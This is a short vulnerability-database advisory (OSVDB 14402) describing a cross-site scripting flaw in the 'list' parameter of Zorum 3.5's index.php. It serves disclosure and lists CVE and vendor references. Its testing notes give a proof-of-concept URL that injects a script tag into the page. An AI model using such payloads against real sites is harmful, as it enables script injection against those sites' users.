Zorum index.php list Variable XSS

2005-03-04T01:39:56
ID OSVDB:14402
Type osvdb
Reporter OSVDB
Modified 2005-03-04T01:39:56

Description

Manual Testing Notes

http://[victim]/zorum_3_5/index.php?list="/><script>alert()</script>

References:

Vendor URL: http://zorum.phpoutsourcing.com/ Security Tracker: 1013365 Secunia Advisory ID:9497 CVE-2005-0675